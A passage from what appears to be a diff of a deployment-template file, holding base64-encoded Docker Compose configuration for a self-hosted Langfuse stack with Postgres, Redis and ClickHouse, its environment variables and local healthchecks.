VVRIPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgIDQwOiAnRU1BSUxfRlJPTV9BRERSRVNTPSR7RU1BSUxfRlJPTV9BRERSRVNTOi1hZG1pbkBleGFtcGxlLmNvbX0nCiAgICAgIDQxOiAnU01UUF9DT05ORUNUSU9OX1VSTD0ke1NNVFBfQ09OTkVDVElPTl9VUkw6LX0nCiAgICAgIDQyOiAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfTkVYVEFVVEhTRUNSRVR9JwogICAgICA0MzogJ0FVVEhfRElTQUJMRV9TSUdOVVA9JHtBVVRIX0RJU0FCTEVfU0lHTlVQOi10cnVlfScKICAgICAgNDQ6ICdIT1NUTkFNRT0ke0hPU1ROQU1FOi0wLjAuMC4wfScKICAgICAgNDU6ICdMQU5HRlVTRV9JTklUX09SR19JRD0ke0xBTkdGVVNFX0lOSVRfT1JHX0lEOi1teS1vcmd9JwogICAgICA0NjogJ0xBTkdGVVNFX0lOSVRfT1JHX05BTUU9JHtMQU5HRlVTRV9JTklUX09SR19OQU1FOi1NeSBPcmd9JwogICAgICA0NzogJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRD0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRDotbXktcHJvamVjdH0nCiAgICAgIDQ4OiAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRTotTXkgUHJvamVjdH0nCiAgICAgIDQ5OiAnTEFOR0ZVU0VfSU5JVF9VU0VSX0VNQUlMPSR7TEFOR0ZVU0VfSU5JVF9VU0VSX0VNQUlMOi1hZG1pbkBleGFtcGxlLmNvbX0nCiAgICAgIDUwOiAnTEFOR0ZVU0VfSU5JVF9VU0VSX05BTUU9JHtTRVJWSUNFX1VTRVJfTEFOR0ZVU0V9JwogICAgICA1MTogJ0xBTkdGVVNFX0lOSVRfVVNFUl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTEFOR0ZVU0V9JwogICAgICBTRVJWSUNFX0ZRRE5fTEFOR0ZVU0VfMzAwMDogJyR7U0VSVklDRV9GUUROX0xBTkdGVVNFXzMwMDB9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL3B1YmxpYy9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAzCiAgbGFuZ2Z1c2Utd29ya2VyOgogICAgaW1hZ2U6ICdsYW5nZnVzZS9sYW5nZnVzZS13b3JrZXI6MycKICAgIGVudmlyb25tZW50OgogICAgICAtICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fTEFOR0ZVU0V9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogICAgICAtICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAgICAgLSAnRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0xBTkdGVVNFfScKICAgICAgLSAnVEVMRU1FVFJZX0VOQUJMRUQ9JHtURUxFTUVUUllfRU5BQkxFRDotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogICAgICAtICdDTElDS0hPVVNFX01JR1JBVElPTl9VUkw9Y2xpY2tob3VzZTovL2NsaWNraG91c2U6OTAwMCcKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMycKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgLSBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogICAgICAtICdMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQj0ke0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9COi1mYWxzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWDotZXZlbnRzL30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRDotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TOi0xfScKICAgICAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUzotMTAwMH0nCiAgICAgIC0gUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFJFRElTX1BPUlQ9NjM3OQogICAgICAtICdSRURJU19BVVRIPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgIC0gJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdTTVRQX0NPTk5FQ1RJT05fVVJMPSR7U01UUF9DT05ORUNUSU9OX1VSTDotfScKICAgICAgLSAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfTkVYVEFVVEhTRUNSRVR9JwogICAgICAtICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgICAgIC0gJ0hPU1ROQU1FPSR7SE9TVE5BTUU6LTAuMC4wLjB9JwogICAgICAtICdMQU5HRlVTRV9JTklUX09SR19JRD0ke0xBTkdGVVNFX0lOSVRfT1JHX0lEOi1teS1vcmd9JwogICAgICAtICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEOi1teS1wcm9qZWN0fScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRTotTXkgUHJvamVjdH0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfTkFNRT0ke1NFUlZJQ0VfVVNFUl9MQU5HRlVTRX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTEFOR0ZVU0V9JwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNy1hbHBpbmUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX3Bvc3RncmVzX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1oIGxvY2FsaG9zdCAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo4JwogICAgY29tbWFuZDoKICAgICAgLSBzaAogICAgICAtICctYycKICAgICAgLSAncmVkaXMtc2VydmVyIC0tcmVxdWlyZXBhc3MgIiRTRVJWSUNFX1BBU1NXT1JEX1JFRElTIicKICAgIGVudmlyb25tZW50OgogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgdm9sdW1lczoKICAgICAgLSAnbGFuZ2Z1c2VfcmVkaXNfZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtICctYScKICAgICAgICAtICRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgICAgLSBQSU5HCiAgICAgIGludGVydmFsOiAzcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTAKICBjbGlja2hvdXNlOgogICAgaW1hZ2U6ICdjbGlja2hvdXNlL2NsaWNraG91c2Utc2VydmVyOmxhdGVzdCcKICAgIHVzZXI6ICcxMDE6MTAxJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0NMSUNLSE9VU0VfREI9JHtDTElDS0hPVVNFX0RCOi1kZWZhdWx0fScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX2NsaWNraG91c2VfZGF0YTovdmFyL2xpYi9jbGlja2hvdXNlJwogICAgICAtICdsYW5nZnVzZV9jbGlja2hvdXNlX2xvZ3M6L3Zhci9sb2cvY2xpY2tob3VzZS1zZXJ2ZXInCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDogJ3dnZXQgLS1uby12ZXJib3NlIC0tdHJpZXM9MSAtLXNwaWRlciBodHRwOi8vbG9jYWxob3N0OjgxMjMvcGluZyB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAo=",
+        "compose": "eC1hcHAtZW52OgogIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfRlFETl9MQU5HRlVTRX0nCiAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAtICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAtICdFTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfNjRfTEFOR0ZVU0V9JwogIC0gJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAtICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogIC0gJ0NMSUNLSE9VU0VfTUlHUkFUSU9OX1VSTD1jbGlja2hvdXNlOi8vY2xpY2tob3VzZTo5MDAwJwogIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogIC0gJ0NMSUNLSE9VU0VfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0NMSUNLSE9VU0V9JwogIC0gQ0xJQ0tIT1VTRV9DTFVTVEVSX0VOQUJMRUQ9ZmFsc2UKICAtICdMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQj0ke0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9COi1mYWxzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ6LWxhbmdmdXNlfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYOi1ldmVudHMvfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg6LW1lZGlhL30nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRDotZmFsc2V9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUOi1sYW5nZnVzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg6LWV4cG9ydHMvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTjotYXV0b30nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VORFBPSU5UfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TOi0xfScKICAtICdMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TOi0xMDAwfScKICAtIFJFRElTX0hPU1Q9cmVkaXMKICAtIFJFRElTX1BPUlQ9NjM3OQogIC0gJ1JFRElTX0FVVEg9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAtICdFTUFJTF9GUk9NX0FERFJFU1M9JHtFTUFJTF9GUk9NX0FERFJFU1M6LWFkbWluQGV4YW1wbGUuY29tfScKICAtICdTTVRQX0NPTk5FQ1RJT05fVVJMPSR7U01UUF9DT05ORUNUSU9OX1VSTDotfScKICAtICdORVhUQVVUSF9TRUNSRVQ9JHtTRVJWSUNFX0JBU0U2NF9ORVhUQVVUSFNFQ1JFVH0nCiAgLSAnQVVUSF9ESVNBQkxFX1NJR05VUD0ke0FVVEhfRElTQUJMRV9TSUdOVVA6LXRydWV9JwogIC0gJ0hPU1ROQU1FPSR7SE9TVE5BTUU6LTAuMC4wLjB9JwogIC0gJ0xBTkdGVVNFX0lOSVRfT1JHX0lEPSR7TEFOR0ZVU0VfSU5JVF9PUkdfSUQ6LW15LW9yZ30nCiAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfTkFNRT0ke0xBTkdGVVNFX0lOSVRfT1JHX05BTUU6LU15IE9yZ30nCiAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEOi1teS1wcm9qZWN0fScKICAtICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRT0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FOi1NeSBQcm9qZWN0fScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw9JHtMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfTkFNRT0ke1NFUlZJQ0VfVVNFUl9MQU5HRlVTRX0nCiAgLSAnTEFOR0ZVU0VfSU5JVF9VU0VSX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9MQU5HRlVTRX0nCnNlcnZpY2VzOgogIGxhbmdmdXNlOgogICAgaW1hZ2U6ICdsYW5nZnVzZS9sYW5nZnVzZTozJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIDA6ICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fTEFOR0ZVU0V9JwogICAgICAxOiAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgMjogJ1NBTFQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NBTFR9JwogICAgICAzOiAnRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0xBTkdGVVNFfScKICAgICAgNDogJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgNTogJ0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM9JHtMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTOi1mYWxzZX0nCiAgICAgIDY6ICdDTElDS0hPVVNFX01JR1JBVElPTl9VUkw9Y2xpY2tob3VzZTovL2NsaWNraG91c2U6OTAwMCcKICAgICAgNzogJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgICAgIDg6ICdDTElDS0hPVVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfQ0xJQ0tIT1VTRX0nCiAgICAgIDk6ICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgMTA6IENMSUNLSE9VU0VfQ0xVU1RFUl9FTkFCTEVEPWZhbHNlCiAgICAgIDExOiAnTEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I9JHtMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQjotZmFsc2V9JwogICAgICAxMjogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIDEzOiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT046LWF1dG99JwogICAgICAxNDogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAxNTogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0x